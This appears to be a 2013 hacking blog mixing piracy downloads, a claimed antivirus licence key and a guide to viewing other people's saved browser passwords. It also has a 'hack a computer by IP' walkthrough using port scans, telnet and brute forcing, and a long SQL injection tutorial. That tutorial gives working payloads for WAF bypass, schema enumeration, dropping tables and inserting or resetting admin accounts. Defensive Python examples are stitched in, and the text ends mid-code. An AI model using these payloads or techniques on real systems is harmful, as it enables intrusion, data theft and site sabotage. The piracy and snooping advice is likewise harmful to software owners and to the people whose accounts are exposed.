Wednesday, 31 July 2013
How to like all the posts on your Timeline
Hello friend, Facebook is the most commonly used social networking website nowadays: you can post, share, comment, etc. As you know, when you open your Facebook account you get a lot of posts on your wall, and I think it's very clumsy and irritating to like all the posts by clicking on each one.
So here is the solution: if you try to be over-social, keeping up with your friends and liking every one of their posts, then here is a relief for you. You can now like all the posts on your wall by clicking a single button in Chrome.
All you need to do is go to this site and install this extension: http://www.chromeextensions.org/social-communications/facebook-like-all/
A quick and easy way to like every comment or status on your current Facebook page. One click and everything is 'Liked' for you.
Get Latest Windows 7 Genuine Advantage Validation 2013 Free Download
The Windows Genuine Advantage (WGA) program is part of the commitment by Microsoft to protect its customers and partners from counterfeiters through education, engineering, and enforcement of policies and laws. WGA differentiates the value of genuine Windows software from counterfeit software. This enables you to enjoy the capabilities that you expect, the confidence that your software is authentic, and the ongoing system improvements that help you do more with your personal computer. The WGA program creates an improved Windows experience for users who have a genuine copy of Windows. By using genuine Microsoft software, you can be confident that you will have access to the latest features, security, and support. This helps improve your productivity and expand the capabilities of your computer. You will also have access to innovations and offerings available only to genuine Microsoft software customers.
Enjoy and Support Developers, Buy It, They Deserved It!
Link to download:
If it asks for a password, the password is: www.shakzone.blogspot.com
Tuesday, 30 July 2013
EA Cricket 2012 Full PC Game Free Download
Requirements:
CPU: 1.0 GHz
RAM: 256 MB
Video Memory: 32 MB
Windows XP, 7, Vista
HDD: 1.2 GB
Download now:
Part 1: Click here to download part 1
Part 2: Click here to download part 2
Enjoy!!! and keep visiting
Licence key up to 2038, Avast!
Licence key for Avast!
Licence key up to 2038.
Enjoy...
Key :-
W6754380R9978A0
910-4TZ59467
Sunday, 28 July 2013
HOW TO HACK REMOTE COMPUTER USING IP ADDRESS
The Internet Protocol is the principal communications protocol used for relaying datagrams (packets) across an internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet.
IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering datagrams from the source host to the destination host solely based on their addresses. For this purpose, IP defines addressing methods and structures for datagram encapsulation.
You may want to hack a website and put your advertisement there or grab some database information. In this type of hacking, you are playing with the web server's computer instead of the administrator's computer, because www.website.com is hosted on a separate web server rather than a personal computer.
Another can be accessing your friend's computer from your home. Again, this is IP based, and it is possible only when your friend's computer is online. If it is off or not connected to the internet, then remote IP hacking is totally impossible.
Well, both kinds of hacking have the same process. Let's summarize what we must do.
- Confirm the website or computer you want to hack.
- Find or trace its IP address.
- Make sure that IP address is online.
- Scan for open ports.
- Check for vulnerable ports.
- Access through the port.
- Brute-force the username and password.
Now let me describe it briefly, in basic steps that even a child can understand.
First, getting the IP address of the victim.
To get the IP address of the victim website, ping it from the command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com.
This is how we can get the IP address of the victim's website.
How about your friend's PC? You can't do www.yourfirend’sname.com, can you? Finding your friend's IP address is a somewhat tough job, and it is tougher if he has a dynamic IP address that keeps changing.
One of the widely used methods to detect the IP address of your friend is by chatting with him.
Once you know the IP address, is it online? To check the online status, just ping the IP address; if it is online, it will reply.
If the IP address is online, scan for open ports. Open ports are like closed doors without locks: you can go in and out easily.
Use Advanced Port Scanner (password is www.cyberelite.in) to scan all open and vulnerable ports.
Now that you have the IP address and open port of the victim, you can use telnet to try to access them. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.
Now open the command prompt and use the telnet command to access the IP address. Use the following syntax for the connection.
telnet [IP address] [Port]
You’ll be asked to input login information.
If you can guess the information easily then it's OK. Or you can use some brute-forcing tools like http://www.hackingspirits.com/eth-hac/tools/brute_force.html
In this way you'll be able to hack a remote computer using only an IP address.
Now you are in!! Enjoy!!!
Posted by HaXoR
Saturday, 27 July 2013
Find Serial key of any software
This is a little trick that I usually use to find CD keys with Google.
If you're looking for a serial number for Nero (for example), go to google.com and type Nero 94FBR and it'll bring it up. This works great in Google.
HOW DOES THIS WORK?
Quite simple really.
94FBR is part of an Office 2000 Pro CD key that is widely distributed, as it bypasses the activation requirements of Office 2K Pro.
By searching for the product name and 94fbr, you guarantee two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee
FACEBOOK PRANKS
1. First, copy this link and send it to your friend.
www.sinthaistudio.com/thehouse/alrena
2. Lie to him that it is the profile of a dead person (somehow scare him with your story).
3. Ask him to click on the “photos” option to check the image, and ask him to wait a few seconds.
4. When he tries to click there, this ghost animation will suddenly appear on screen.
Thursday, 25 July 2013
Full Page Script
Assalam o alaikum! Guys, today I'm going to tell you how to put a full-page script on your blog. First of all, go to blogger.com.
Click on Layout, then you will see something like "Add gadget". Click on that and it will open a window; scroll down and there will be "java/html script". Now click on the plus (+) button and paste the script below into it.
After domains, add your blog link and enjoy!
<script type="text/javascript">
var adfly_id = 4637926;
var adfly_advert = 'int';
var exclude_domains = ['For example.com'];
</script>
<script src="https://cdn.adf.ly/js/link-converter.js"></script>
How to have only first name on facebook
Facebook first name UPDATED !
Note: I don't care if this tutorial has been made before, I'm making one so deal with it.
Now, for the people who want to know, this is how to make your Facebook account show your first name only.
Things you'll need:
-A brain
-Mozilla Firefox
-Common Sense
Okay, first open up Mozilla Firefox
Now do you see settings at the bottom? Click it
It should open up a window
When you see "Network" click that.
Now it should open up this window!
Go to "Configure how FireFox connects to the internet"
It should open up this window.
Select "manual proxy" and put in THIS IP 27.123.4.106 and for the port put 8080.
Once you have done that, tick the box for "use proxy for all protocols" and then hit OK.
Now go to Facebook
"http://www.facebook.com/"
Sign into your account
Go to "Account settings"
Scroll down to Language and change it from "English" or whatever language you have to:
"Bahasa Indonesian" which is located NEAR THE TOP.
Save it, THEN go to your name change, erase the last name and hit save and there you go you have a first name only on Facebook.
MAKE SURE YOU DO THIS ALL IN FIREFOX. WHEN YOU'RE DONE GET RID OF PROXY(If you want).
Thanks for reading this tutorial and hopefully I helped ONE person out.
How To Hack Saved Password In Firefox
How to do it?
1. Open the Firefox web browser.
2. Then click on Firefox > Options > Options as shown in the picture below.
3. A pop-up box will appear. In it, go to Security and click on Show Passwords as shown below.
4. Now click on the website whose password you want to see and click on Show Password as shown in the image below. (Note: it will ask for confirmation, so click Yes when the dialog box appears.)
5. Done. You have hacked the password of your victim in a few simple steps. You can try this on a school computer lab machine if someone has saved their password.
Wednesday, 24 July 2013
How to make money with androids or iphone
Today I'm going to teach you about making money with your Android or iOS device.
To earn money, just go to the following link on your Android or iOS device and download it,
and when it asks for a code at the start, enter the code 0uz3pl
http://featurepoints.com/web/
Posted by HaXoR
Convert your text into Audio (notepad tricks)
Today I am going to tell you another Notepad trick. If you want to convert your text into audio, you normally have to use a program. But with this method you don't need to use any other software. An easy trick from Notepad.
Let's start.
Open Notepad.
Copy the code below.
Dim msg, sapi
msg=InputBox("Enter your text for Conversation | Tool by HaXoR (http://hackingwithkingmaker.blogspot.com)","PC Hacks Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Now save it as text_audio.vbs
And that's it.
Now open the file and type anything. Then click OK.
Problems related to SQL Injection
SQL Injection:
Most problems encountered while doing SQL injection, and solutions to them. Probably every person who has looked at tutorials on hacking a website has noticed that there are too many SQL tutorials. Almost every forum has 10 tutorials and every blog 5 tutorials about SQL injection, but those tutorials are actually stolen from somewhere else, and the author probably doesn't even know why SQL injection works. All of those tutorials are like textbooks with their ABCs, and the result is just a mess. Everyone is writing tutorials about SQL, but nobody covers the problems that come with that attack.
What is the cause of most problems related to SQL injection?
Web developers aren't always really dumb; they have also heard of hackers and have implemented some security measures like a WAF or manual protection. A WAF is a web application firewall and will block all malicious requests, but WAFs are quite easy to bypass. Nobody would like to have their site hacked, so they are also implementing some security, but of course it would be false to say that if we fail then it's the server's fault. There's also a huge possibility that we're injecting in a different way than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Order by is being blocked?
It rarely happens, but sometimes you can't use order by because the WAF has blocked it or for some other reason. Unfortunately we can't skip the order by, so we have to find another way. The way is simple: instead of using Order by we use Group by, because that's very unlikely to be blacklisted by the WAF.
If that request returns 'forbidden', it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try Group by, and it will return correctly:
http://site.com/gallery?id=1 group by 100-- / success
There's still a possibility that the WAF will block the request, but there's one other way, and it's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably receive an error like this: Operand should contain 5 column(s).
That error means there are 5 columns, and it means we can proceed to our next step, which is union select. The command was different than usual, but the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still no error?
This is a small chapter where I'll tell you why order by sometimes won't work and you don't see an error. The difference between this chapter and the last one is that previously your requests were blocked by the WAF, but here the injection method is just a little bit different. When I saw that for the first time, I thought: how does a database have 100000 columns, because I'm not getting the error while the site is vulnerable?
The answer is quite logical. When trying order by 1000000, we're not getting the error not because there are so many columns in there; we're not getting the error because our injection isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
To bypass this you just have to change the URL a little bit. Add ' after the ID number and at the end just enter +
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example works for you, it means you have to use it in the next steps too. There isn't anything complicated, but to make everything clear I'll still give an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
Extracting data from other database.
Sometimes we can inject successfully and no error appears; it's just like a hacker's dream. That dream ends at the moment we see that nothing useful to us exists there. There are only a few tables, called "News", "gallery" and "articles". They aren't useful to us at all, because we'd like to see tables like "Admin" or "Administrator". Still, we know that the server probably has several databases, and even if you have found the information you're looking for, you should still take a look in the other databases too.
This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL to this:
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
How to bypass WAF/Web application firewall
The biggest reason why most of these problems appear is the security measures added to the server, and the WAF is the biggest one, but mostly they're made really badly and can be bypassed really easily. Mostly you will get a 404 error like the one in the code below; this is the WAF. Most likely people who're into SQL injection and bypassing WAFs are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAFs is a different kind of science and I could write an ebook on bypassing these. I'll keep all those bypassing queries for another time and won't cover them this time.
"404 forbidden you do not have permission to access to this webpage"
The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1%2C2%2C3%2C4%2C5--
[Error]
Change the URL like it's below.
http://www.site.com/index.php?id=-1+%2F%2A%21UnIoN%2A%2F+%2F%2A%21sELeCt%2A%2F1%2C2%2C3%2C4%2C5--
[No error]
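Why the re-cased, comment-wrapped request above gets past a keyword rule, and what a detection rule has to normalize before matching. This is an added example, not code from the original post; the rule names, the `classify` helper and the sample request targets (constructed from the URLs in this section) are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# A keyword rule of the kind the text calls easy to bypass:
# decode once, then look for "union select".
NAIVE_RULE = re.compile(r"union\s+select", re.IGNORECASE)

# MySQL executes the body of /*! ... */ (optionally /*!50000 ... */),
# so a detector must keep the body and drop only the comment markers.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Rules applied to the normalized query string (names are illustrative).
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "column_probe": re.compile(r"\b(?:order|group)\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "stacked_write": re.compile(r";\s*(?:drop|update|insert)\b"),
}


def normalize(query, max_rounds=3):
    """Decode, unwrap SQL comments, collapse whitespace, lowercase."""
    text = query
    for _ in range(max_rounds):  # repeat to undo double URL encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED_COMMENT.sub(r" \1 ", text)  # keep the executed body
    text = PLAIN_COMMENT.sub(" ", text)          # ordinary comments act as spaces
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_match(target):
    """What the weak filter sees: one decode pass, no comment handling."""
    return bool(NAIVE_RULE.search(unquote_plus(urlsplit(target).query)))


def classify(target):
    """Return the names of all rules that fire on the normalized query."""
    norm = normalize(urlsplit(target).query)
    return [name for name, rule in RULES.items() if rule.search(norm)]


# Constructed request targets, as they would appear in an access log.
SAMPLE_TARGETS = [
    "/gallery?id=1%20order%20by%20100--",
    "/gallery?id=1%20group%20by%20100--",
    "/index.php?id=-1+union+select+1%2C2%2C3%2C4%2C5--",
    "/index.php?id=-1+%2F%2A%21UnIoN%2A%2F+%2F%2A%21sELeCt%2A%2F1%2C2%2C3%2C4%2C5--",
    "/news.php?id=9+union+select+1,2,group_concat(schema_name),4"
    "+from+information_schema.schemata",
    "/news.php?id=1;%20DROP%20TABLE%20news",
    "/news.php?id=9",
]


def report(targets=SAMPLE_TARGETS):
    """(target, naive verdict, normalized rule hits) for each request."""
    return [(t, naive_match(t), classify(t)) for t in targets]


if __name__ == "__main__":
    for target, naive, hits in report():
        print(f"naive={naive!s:5} hits={hits} {target}")
```

Matching like this is a detection aid for logs and alerts; it does not remove the injection flaw, which is fixed in the application's query code.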
Is it possible to modify the information in the database by SQL injection?
Most people aren't aware of it, but it's possible. You're able to update, drop, insert and select information. Most people who deal with SQL injection have never looked deeper into the attack than what is shown in the average SQL injection tutorial, and an average SQL injection tutorial doesn't include those statements. Most likely that's because most people are copying and pasting tutorials or just rewriting them. You might ask: why should one update, drop or insert information into the database if I can just read the information and use the existing entries? Why should we make another Administrator account if one already exists?
Reading the information is just one part of the injection, and sometimes those other, quite infamous commands are more powerful than we thought. If you have read all the available SQL injection tutorials, then you're probably aware that you can read the information, but you didn't know you're able to modify it. If you have tried SQL injection, then you have probably faced some problems. There isn't an administrator account, so why not use the INSERT command to add one? There isn't an admin page to log in to, so why not drop the table and all its information so nobody can access it? I want to get rid of the current Administrator and can't change his password, so why not use the UPDATE command to change the Administrator's password?
You have probably noticed that I have talked a lot about seemingly unnecessary information, but it's information you need to learn and understand to become a real hacker, because you have to learn how SQL databases work to figure out how those commands work, and you can't find tutorials about that on the net. It's just like the math you learn in school: if you don't learn it, you'll be in trouble when you grow up.
Theory is almost over and now let's get to the practice.
Let's say that we're visiting that page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.
I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy: we have just dropped the table. I'd explain what we did in the above statement, but it's hard to explain because you can all understand the above command. Unfortunately most 'hackers' who make tutorials on SQL injection aren't aware of it, and sometimes those three words are more important than all the information we can read in some tutorials.
Let's head to the next statement, which is UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--
The above explanation might be quite confusing, so I'll add a query that you're most likely going to use in real life:
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated the Administrator account's password. In the above example we updated the column called 'admin_login' and added a password, which is "Crackhackforum", and those credentials belong to the account whose username is Rynaldo. Kind of heavy to explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't as easy as the "DROP" statement, but it's still quite understandable. Let's go further with Administrator privileges, because that's what most people are heading for. Adding an administrator account would look like this:
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something into 'admin_login'. Now we have to tell the database exactly what information we want to add. ('login_id', 'login_name', 'password', 'details') means that the fields we're adding to the DB are login_id, login_name, password and details, and those are the pieces of information the database needs to create a new account. So far we have told the database what information we want to add: a new account, its password, an account ID and details. Now we have to tell the database what the new account's username, its password and its account ID will be: VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means the account ID is 2, the username will be Rynaldo, and the password of the account will be Crackhackforum. Your new account has been added to the database, and all you have to do is open the Administrator page and log in.
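The stacked DROP and INSERT statements described above only run when request text is pasted into the SQL string, so here is that "before" next to a parameterized "after" and a read-only connection. This is an added example, not code from the original post; it uses Python's `sqlite3` with a constructed in-memory database as a stand-in for the PHP/MySQL site, and all function names are hypothetical.

```python
import sqlite3

# Constructed payloads mirroring the statements discussed in the text.
STACKED_DROP = "1; DROP TABLE news"
STACKED_INSERT = ("1; INSERT INTO admin_login "
                  "VALUES (2, 'Rynaldo', 'Crackhackforum', 'NA')")


def make_db():
    """Constructed in-memory database using the table names from the text."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin_login (
            login_id INTEGER PRIMARY KEY, login_name TEXT,
            password TEXT, details TEXT);
        INSERT INTO news VALUES (1, 'Site launched');
        INSERT INTO admin_login VALUES (1, 'admin', 'hash-placeholder', 'NA');
        """
    )
    return conn


def tables(conn):
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
    return [row[0] for row in rows]


def admin_count(conn):
    return conn.execute("SELECT COUNT(*) FROM admin_login").fetchone()[0]


def get_news_vulnerable(conn, raw_id):
    """The 'before': request text is concatenated into the SQL and run through
    an API that accepts several statements, so text after ';' executes."""
    conn.executescript("SELECT title FROM news WHERE id = " + raw_id)


def get_news_safe(conn, raw_id):
    """The 'after': validate the type, then bind the value as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return None  # anything that is not a plain numeric id is rejected
    row = conn.execute(
        "SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def get_news_bound_only(conn, raw_id):
    """Binding alone: the whole string is one value and is never parsed as SQL."""
    row = conn.execute(
        "SELECT title FROM news WHERE id = ?", (raw_id,)).fetchone()
    return row[0] if row else None


def run_with_read_only_account(conn, raw_id):
    """Defense in depth: with a read-only connection (stand-in for a
    SELECT-only database account) even the vulnerable code cannot write."""
    conn.execute("PRAGMA query_only = ON")
    try:
        get_news_vulnerable(conn, raw_id)
        return "executed"
    except sqlite3.Error:
        return "blocked"


if __name__ == "__main__":
    db = make_db()
    get_news_vulnerable(db, STACKED_DROP)
    print("vulnerable, tables left:", tables(db))
    db = make_db()
    print("safe result:", get_news_safe(db, STACKED_DROP), tables(db))
    db = make_db()
    print("read-only account:", run_with_read_only_account(db, STACKED_DROP))
```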
Passwords aren't working
Sometimes the site is vulnerable to SQL injection and you can get the passwords. Then you can find the site's username and password, but when you enter them into the admin panel it shows "Wrong password". This can be because those usernames and passwords are there but aren't working. This is done by the site's admin to confuse you, and actually the Cpanel doesn't contain any username/password. Sometimes accounts are removed but are still in the database. Sometimes it isn't done by the admin, and those credentials have been left in the database after the login page was removed; sometimes the real credentials have been transferred to another database and the old entries haven't been deleted.
Sometimes i get some weird password
This weird password is called a hash, and most likely it's an MD5 hash. That means the site's admin has added more security to the website and has encrypted the passwords. The most popular way of crypting is using an MD5 hash. The best way to crack MD5 hashes is using PasswordsPro or Hashcat, because they're the best and can crack the password even if it's really hard or isn't MD5. You can also use http://md5decrypter.com/ . I don't like to be a person who fusses over small details that aren't correct, but here's a tip you should keep in mind. The domain says it's "md5decryptor", which refers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash, because hashes have 'one-way' encryption. One-way encryption means it can only be encrypted, but not decrypted. Still, that doesn't mean we can't find out what the hash means; we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time; they save already cracked hashes and results to their database, and if you ask for a hash that's already in their database, you will get the result.
Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
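The lookup behaviour described above is the reason unsalted MD5 is a weak way to store passwords: the same password always gives the same digest, so one stored answer serves every site. The added example below (not from the original post) reproduces the `12345` digest quoted in the text and contrasts it with a salted, slow PBKDF2 record; the storage format, function names and iteration count are assumptions.

```python
import hashlib
import hmac
import os

# From the text: the unsalted MD5 digest of "12345".
PAGE_HASH = "827ccb0eea8a706c4c34a16891f84e7b"
ITERATIONS = 600_000  # assumed work factor; tune to your own hardware


def md5_lookup_table(candidates):
    """What a lookup site stores: digest -> password that is already known."""
    return {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, deliberately slow hash; the record format is illustrative."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        expected = bytes.fromhex(digest_hex)
        actual = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex),
            int(iterations))
    except ValueError:  # malformed record
        return False
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # Constructed candidate list: a tiny stand-in for a precomputed table.
    table = md5_lookup_table(["password", "12345", "qwerty"])
    print("unsalted MD5 found in table:", table.get(PAGE_HASH))

    first = hash_password("12345")
    second = hash_password("12345")
    # Same password, different salt: the two records never match each
    # other, so one precomputed table cannot cover both.
    print("records differ:", first != second)
    print("verifies:", verify_password("12345", first))
    print("wrong password verifies:", verify_password("123456", first))
```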
How to find admin page of site?
Some sites don't contain an admin control panel, which means you can use any method for finding the admin page, but it doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after the Cpanel was removed.
Mostly people use tools called "Admin page finders". They have a specific list of pages and will try them. If the page gives HTTP response 200, it means the page exists, but if the server responds with HTTP response 404, it means the page doesn't exist there. If a page from the list exists, the tool will say "Page found". I don't have any tool to share at the moment, but if you're downloading one yourself then beware, because most of those tools are infected with viruses.
The tools I mentioned above, Admin Page Finders, usually don't find the administrator page if it's custom made or renamed. That means quite often those tools don't help us and we have to use an alternative, and I think the best one is using site crawlers. Most of you probably have Acunetix Web Vulnerability Scanner 8, and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will 100% find the login page if one exists on the site.
Automated SQL injection tools.
Automated SQL injection tools are programs that will do the whole work for you; sometimes they will even crack the hashes and find the Administrator page for you. Most people use automated SQL injection tools, and the most popular of them are Havij and SQLmap. Havij is used much more than SQLmap, no matter that the other tool is much better for that injection. The sad truth about why that's so is that many people aren't even able to run SQLmap, and those persons are called script-kiddies. Being a script-kiddie is the worst thing you can be in the hacking world, and if you don't learn how to perform the attack manually and only use tools, then you're one of them. If you're using those tools to perform the attack, most people will think that you're a script-kiddie, because most likely you are. Professionals won't take you seriously if you're injecting with them, and you won't become a real hacker either. My text above might raise a question, "But I've seen that even professional hackers are using SQLmap?", and I'd like to say that everything isn't always black and white. If there are 10 databases, 50 tables in them and 100 columns in each table, then it would just take days to process all that information. I also sometimes use automated tools because it makes my life easier, but to use those tools you first have to learn how to do what they do manually, and that's what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database, and sometimes they are much more powerful. We have talked above about how sometimes the database doesn't contain the Administrator's credentials or you can't crack the hashes. Then the whole injection seems pointless, because we can't use the information we have got from the database. Still, we can use a few other methods. Just as we can conduct a CSRF attack with persistent XSS, we can also move on to other attacks through SQL injection. One of the solutions would be performing a DOS attack on the website which is vulnerable to SQL injection. DOS is short for Denial of Service, and it's totally different from DDOS, which is Distributed Denial of Service. I think that you all probably know what these are, but to sum that attack up in a sentence, DOS will allow us to take down the website temporarily so users won't have access to the site. The other way would be uploading our shell through SQL injection. If you're wondering what a shell is, then, put shortly, it's a script that we upload to the server; it creates a backdoor for us and gives us all the privileges to do what we'd like on the server, and sometimes by uploading a shell you have more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink, which means we can deface all the sites that share the same server. Shelling the website is probably the most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS either, but I probably will in my next tutorials, because uploading a shell through SQL is another kind of science, just like bypassing WAFs. Those are the most common methods that attackers will put to use when they can't get anything useful out of the database.
Of course not every website has the same vulnerabilities, and they don't always respond like we want, and by that I mean we can't perform those attacks on all websites. We have all heard that imagination is unlimited and you can do whatever you'd like. That's kind of true and hacking isn't an exception; there are more ways than I can count.
What to do if all the information doesn't display on the page?
I have actually very rarely seen so much information on a webpage that it doesn't all fit, but one person recently asked me that question and I decided to add it here. Also, if you have questions, do ask and I'll update the article. Getting back to the question, the answer is simple: if all the information can't fit on the screen, then you have to look at the source code, because everything displayed on the webpage will be in there. Sometimes the information will also appear in the tab where the site's name usually is. If you can't see the information, then sometimes it's hidden, but by taking a deeper look you might find it in the source. That's why you always have to try all the options before quitting, because sometimes you might think "I can't inject into that..", but actually the answer is hidden in the source.
What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest reading about null bytes; here's a good explanation: http://en.wikipedia.org/wiki/Null_character, because it might give you some hint why -- is being used. Adding -- to the end of the URL isn't always necessary; it depends on the target. It doesn't have any influence on the injection because it doesn't mean anything, but it's still used because it marks the end of the query. This means that if I'm injecting as: http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be read. It's just like adding to masking a shell. Sometimes the injection doesn't work if -- is missing, because -- tells the DB "I'm the end of the query; don't read anything that comes after me and execute everything in front of me". It's just like writing a sentence without a full stop: people might think it's not the end of your sentence and will wait until you write the other part, and the end only comes when you add the full stop.
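The behaviour described in this answer, shown from the defending side as an added example (not code from the original tutorial): in SQL, -- starts a comment that runs to the end of the line, so a value pasted into the query text can cut off whatever the application appended after it, while a bound parameter cannot. It assumes SQLite as a stand-in for the site's database; the table, its columns and the helper names are constructed for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: a five-column table standing in for news.php's backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, "
               "author TEXT, published INTEGER)")
    db.execute("INSERT INTO news VALUES (1, 'Hello', 'First post', 'admin', 1)")
    return db

COLUMNS = "id, title, body, author, published"

def fetch_concat(db, raw_id):
    """Deliberately vulnerable: the request value becomes part of the SQL text."""
    sql = "SELECT " + COLUMNS + " FROM news WHERE id = " + raw_id + " AND published = 1"
    return db.execute(sql).fetchall()

def fetch_bound(db, raw_id):
    """Hardened: the value is bound as data, so it can never add SQL syntax."""
    sql = "SELECT " + COLUMNS + " FROM news WHERE id = ? AND published = 1"
    return db.execute(sql, (raw_id,)).fetchall()

def outcome(fetch, db, raw_id):
    """Run one lookup and report either the rows or the database error."""
    try:
        return fetch(db, raw_id)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

WITH_COMMENT = "-1 union select 1,2,3,4,5-- asasdasd"   # value from the page's URL
WITHOUT_COMMENT = "-1 union select 1,2,3,4,5 asasdasd"  # same value, no "--"

if __name__ == "__main__":
    db = make_db()
    for label, value in (("with --", WITH_COMMENT), ("without --", WITHOUT_COMMENT)):
        # Concatenated: "--" comments out the appended "AND published = 1";
        # without it the leftover text is a syntax error.
        print(label, "| concatenated:", outcome(fetch_concat, db, value))
        # Bound: the whole value is compared with id as one string and matches nothing.
        print(label, "| bound:       ", outcome(fetch_bound, db, value))
```

With the bound version a normal request such as id=1 still returns the article, so the fix costs nothing in functionality.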
Tips for a secure password
The first step in protecting your online privacy is creating a safe password - i.e. one that a computer program or persistent individual won't easily be able to guess in a short period of time. To help you choose a secure password, we've created a feature that lets you know visually how safe your password is as soon as you create it.
Tips for creating a secure password:
Include punctuation marks and/or numbers.
Mix capital and lowercase letters.
Include similar looking substitutions, such as the number zero for the letter 'O' or '$' for the letter 'S'.
Create a unique acronym.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh'.
Things to avoid:
Don't reuse passwords for multiple important accounts, such as Gmail and online banking.
Don't use a password that is listed as an example of how to pick a good password.
Don't use a password that contains personal information (name, birth date, etc.)
Don't use words or acronyms that can be found in a dictionary.
Don't use keyboard patterns (asdf) or sequential numbers (1234).
Don't make your password all numbers, uppercase letters or lowercase letters.
Don't use repeating characters (aa11).
Tips for keeping your password secure:
Never tell your password to anyone (this includes significant others, roommates, parrots, etc.).
Never write your password down.
Never send your password by email.
Periodically test your current password and change it to a new one.
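As an added example (not part of the original post), here is a small checker for the "Things to avoid" list above. It covers only the items that can be tested from the password itself, so password reuse is out of scope; the word list, the function names and the personal details passed in are constructed for the illustration.

```python
import re

# Constructed stand-ins: a real checker would load a full wordlist.
DICTIONARY = {"password", "dragon", "monkey", "letmein", "love", "laugh"}
# Passwords the tips themselves print as examples.
LISTED_EXAMPLES = {"luv 2 laf"}
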